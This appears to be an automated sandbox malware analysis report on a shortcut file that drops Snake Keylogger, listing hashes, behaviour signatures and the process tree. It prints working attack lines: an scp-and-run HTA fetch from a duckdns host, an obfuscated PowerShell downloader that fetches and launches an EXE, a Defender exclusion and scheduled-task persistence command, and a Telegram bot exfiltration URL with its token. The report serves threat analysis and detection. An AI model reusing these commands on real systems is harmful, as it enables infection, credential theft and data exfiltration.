Analysis
-
max time kernel
143s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
03-10-2023 09:57
Static task
static1
Behavioral task
behavioral1
Sample
QP0990001.lnk
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
QP0990001.lnk
Resource
win10v2004-20230915-en
General
-
Target
QP0990001.lnk
-
Size
2KB
-
MD5
c23a4b2e392af2535198428aafcbc7a4
-
SHA1
02a472fb5f6be33044c51420b6fa98fe3adf6251
-
SHA256
81b9e6ecd9d94421b7bef50c53e109e15927b3fdfb5068f51a742b662a7deaad
-
SHA512
17172ade2ef629d2b878635015a6bcbc73464737b51fc7312b1b6ffc76ea238a568bae3f479c8e2f5ef775404681d731c8217cdb6249fad8a5db98902ea00747
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot6678785785:AAE948y1Spb4BUdVN86G6De5C3QmbuoXvWc/sendMessage?chat_id=6445748530
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/812-76-0x0000000000400000-0x0000000000424000-memory.dmp family_snakekeylogger behavioral2/memory/812-109-0x0000000005520000-0x0000000005530000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 48 4512 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.execmd.exemshta.exen1vphgdozXo9m5v.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation n1vphgdozXo9m5v.exe -
Executes dropped EXE 2 IoCs
Processes:
n1vphgdozXo9m5v.exen1vphgdozXo9m5v.exepid process 3896 n1vphgdozXo9m5v.exe 812 n1vphgdozXo9m5v.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
n1vphgdozXo9m5v.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 n1vphgdozXo9m5v.exe Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 n1vphgdozXo9m5v.exe Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 n1vphgdozXo9m5v.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 145 checkip.dyndns.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
n1vphgdozXo9m5v.exedescription pid process target process PID 3896 set thread context of 812 3896 n1vphgdozXo9m5v.exe n1vphgdozXo9m5v.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exen1vphgdozXo9m5v.exepid process 4512 powershell.exe 4512 powershell.exe 4512 powershell.exe 4788 powershell.exe 4788 powershell.exe 4788 powershell.exe 812 n1vphgdozXo9m5v.exe 812 n1vphgdozXo9m5v.exe 812 n1vphgdozXo9m5v.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exen1vphgdozXo9m5v.exesvchost.exedescription pid process Token: SeDebugPrivilege 4512 powershell.exe Token: SeDebugPrivilege 4788 powershell.exe Token: SeDebugPrivilege 812 n1vphgdozXo9m5v.exe Token: SeManageVolumePrivilege 1388 svchost.exe -
Suspicious use of WriteProcessMemory 29 IoCs
Processes:
cmd.execmd.exescp.exemshta.exepowershell.exen1vphgdozXo9m5v.exedescription pid process target process PID 4224 wrote to memory of 5052 4224 cmd.exe cmd.exe PID 4224 wrote to memory of 5052 4224 cmd.exe cmd.exe PID 5052 wrote to memory of 4904 5052 cmd.exe scp.exe PID 5052 wrote to memory of 4904 5052 cmd.exe scp.exe PID 4904 wrote to memory of 1884 4904 scp.exe ssh.exe PID 4904 wrote to memory of 1884 4904 scp.exe ssh.exe PID 5052 wrote to memory of 2236 5052 cmd.exe mshta.exe PID 5052 wrote to memory of 2236 5052 cmd.exe mshta.exe PID 5052 wrote to memory of 2236 5052 cmd.exe mshta.exe PID 2236 wrote to memory of 4512 2236 mshta.exe powershell.exe PID 2236 wrote to memory of 4512 2236 mshta.exe powershell.exe PID 2236 wrote to memory of 4512 2236 mshta.exe powershell.exe PID 4512 wrote to memory of 3896 4512 powershell.exe n1vphgdozXo9m5v.exe PID 4512 wrote to memory of 3896 4512 powershell.exe n1vphgdozXo9m5v.exe PID 4512 wrote to memory of 3896 4512 powershell.exe n1vphgdozXo9m5v.exe PID 3896 wrote to memory of 4788 3896 n1vphgdozXo9m5v.exe powershell.exe PID 3896 wrote to memory of 4788 3896 n1vphgdozXo9m5v.exe powershell.exe PID 3896 wrote to memory of 4788 3896 n1vphgdozXo9m5v.exe powershell.exe PID 3896 wrote to memory of 1892 3896 n1vphgdozXo9m5v.exe schtasks.exe PID 3896 wrote to memory of 1892 3896 n1vphgdozXo9m5v.exe schtasks.exe PID 3896 wrote to memory of 1892 3896 n1vphgdozXo9m5v.exe schtasks.exe PID 3896 wrote to memory of 812 3896 n1vphgdozXo9m5v.exe n1vphgdozXo9m5v.exe PID 3896 wrote to memory of 812 3896 n1vphgdozXo9m5v.exe n1vphgdozXo9m5v.exe PID 3896 wrote to memory of 812 3896 n1vphgdozXo9m5v.exe n1vphgdozXo9m5v.exe PID 3896 wrote to memory of 812 3896 n1vphgdozXo9m5v.exe n1vphgdozXo9m5v.exe PID 3896 wrote to memory of 812 3896 n1vphgdozXo9m5v.exe n1vphgdozXo9m5v.exe PID 3896 wrote to memory of 812 3896 n1vphgdozXo9m5v.exe n1vphgdozXo9m5v.exe PID 3896 wrote to memory of 812 3896 n1vphgdozXo9m5v.exe n1vphgdozXo9m5v.exe PID 3896 wrote to memory of 812 3896 n1vphgdozXo9m5v.exe n1vphgdozXo9m5v.exe -
outlook_office_path 1 IoCs
Processes:
n1vphgdozXo9m5v.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 n1vphgdozXo9m5v.exe -
outlook_win_path 1 IoCs
Processes:
n1vphgdozXo9m5v.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 n1vphgdozXo9m5v.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\QP0990001.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "scp -o StrictHostKeyChecking=no [email protected]:/aa/DZZ C:\Users\Admin\AppData\Roaming\eeMT.hta" & C:\Users\Admin\AppData\Roaming\eeMT.hta2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\System32\OpenSSH\scp.exescp -o StrictHostKeyChecking=no [email protected]:/aa/DZZ C:\Users\Admin\AppData\Roaming\eeMT.hta3⤵
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Windows\System32\OpenSSH\ssh.exe"C:\Windows\System32\OpenSSH\ssh.exe" -x -oForwardAgent=no -oPermitLocalCommand=no -oClearAllForwardings=yes -oRemoteCommand=none -oRequestTTY=no -o StrictHostKeyChecking=no -l aa -- hta4lyfeohyea.duckdns.org "scp -f /aa/DZZ"4⤵PID:1884
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\eeMT.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function mVisUpqit($j, $Xl){[IO.File]::WriteAllBytes($j, $Xl)};function YAnYyojob($j){if($j.EndsWith((vNhoq @(53343,53397,53405,53405))) -eq $True){Start-Process (vNhoq @(53411,53414,53407,53397,53405,53405,53348,53347,53343,53398,53417,53398)) $j}else{Start-Process $j}};function wxsxZbvJk($w){$de = New-Object (vNhoq @(53375,53398,53413,53343,53384,53398,53395,53364,53405,53402,53398,53407,53413));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Xl = $de.DownloadData($w);return $Xl};function vNhoq($aw){$fl=53297;$m=$Null;foreach($b in $aw){$m+=[char]($b-$fl)};return $m};function ajEwZvwJ(){$TaaVVi = $env:APPDATA + '\';$xyRHLrvhS = wxsxZbvJk (vNhoq @(53329,53401,53413,53413,53409,53355,53344,53344,53346,53352,53354,53343,53349,53348,53343,53346,53352,53351,53343,53349,53347,53344,53404,53414,53396,53402,53344,53407,53346,53415,53409,53401,53400,53397,53408,53419,53385,53408,53354,53406,53350,53415,53343,53398,53417,53398));$FfTiWLO = $TaaVVi + 'n1vphgdozXo9m5v.exe';mVisUpqit $FfTiWLO $xyRHLrvhS;YAnYyojob $FfTiWLO;;;;}ajEwZvwJ;4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Users\Admin\AppData\Roaming\n1vphgdozXo9m5v.exe"C:\Users\Admin\AppData\Roaming\n1vphgdozXo9m5v.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\XTAxVe.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4788 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XTAxVe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp42E0.tmp"6⤵
- Creates scheduled task(s)
PID:1892 -
C:\Users\Admin\AppData\Roaming\n1vphgdozXo9m5v.exe"C:\Users\Admin\AppData\Roaming\n1vphgdozXo9m5v.exe"6⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:812
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵PID:3888
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1388
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
Filesize
17KB
MD5822205fa3d87c6335be84ff8c2d95719
SHA17f78d4d82da074a883d6315da971d0c92c071b59
SHA2566ad955a572b0dced5f279fbaea5c16017e73b3c1d192f552e6d682c5db0bdcbe
SHA51281659ec78b6f5eb9042f5c4807fdbae8c913575e4e02317f61ed3b92f2b0adc84f13e9fd1a30406ee3d854b9f0a90f30ffb1af7b59247a1ceec222bd69a4b2e0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5e793d996cd78536f6e2bd166deea37f4
SHA1f64f5da591d0235ef9aefbd0dd48969f55888dc7
SHA2569adeea6ead55b06fb2669fef5980ef63796449fe00e37d9743ccaf1da5fbf8ea
SHA512bc6ca708502e4816d346e11a3da534c1f89ee006e69d0947332099cecfa53a2f247e127a07b0988344072ab89aae93eec849691099a31fe6a05e6aed0d6080b1
-
Filesize
48KB
MD52b49ac452f8ef311f2c8919d1b6cd628
SHA1d06d4a5d04e6e5d360f2cb6680807aa4dd7c0aa1
SHA256b488e09cd83462e24bc730f783718b396eba8ac909a4acc8a725127b3393d7f5
SHA51221c716579bde4e6ae03944e67da3e6bdda279f81bbe0a891d9603dbe6d96ce6571b6495d2331f63403d47599c0a3911e24da7e9f2593a36cefeb58d74844e127
-
Filesize
488KB
MD5b06685857805dd70dc10d2bb46f3d31c
SHA16e5bda91220b0548c92c899db8fa162edec30826
SHA2566ec34fe81f76048d8e8c35bba41cedc7135db9e45b011a9d79e0ddfb85dd9034
SHA5127246e806872fd4cb6a3cf8f98911c0b9aac6c1a01f2d3aa73c7d2140e48d2d14790de9a83839a080def23ddc87a3aa717d301937ca90db7f6f5e2e6a84119bc5
-
Filesize
488KB
MD5b06685857805dd70dc10d2bb46f3d31c
SHA16e5bda91220b0548c92c899db8fa162edec30826
SHA2566ec34fe81f76048d8e8c35bba41cedc7135db9e45b011a9d79e0ddfb85dd9034
SHA5127246e806872fd4cb6a3cf8f98911c0b9aac6c1a01f2d3aa73c7d2140e48d2d14790de9a83839a080def23ddc87a3aa717d301937ca90db7f6f5e2e6a84119bc5
-
Filesize
488KB
MD5b06685857805dd70dc10d2bb46f3d31c
SHA16e5bda91220b0548c92c899db8fa162edec30826
SHA2566ec34fe81f76048d8e8c35bba41cedc7135db9e45b011a9d79e0ddfb85dd9034
SHA5127246e806872fd4cb6a3cf8f98911c0b9aac6c1a01f2d3aa73c7d2140e48d2d14790de9a83839a080def23ddc87a3aa717d301937ca90db7f6f5e2e6a84119bc5
-
Filesize
488KB
MD5b06685857805dd70dc10d2bb46f3d31c
SHA16e5bda91220b0548c92c899db8fa162edec30826
SHA2566ec34fe81f76048d8e8c35bba41cedc7135db9e45b011a9d79e0ddfb85dd9034
SHA5127246e806872fd4cb6a3cf8f98911c0b9aac6c1a01f2d3aa73c7d2140e48d2d14790de9a83839a080def23ddc87a3aa717d301937ca90db7f6f5e2e6a84119bc5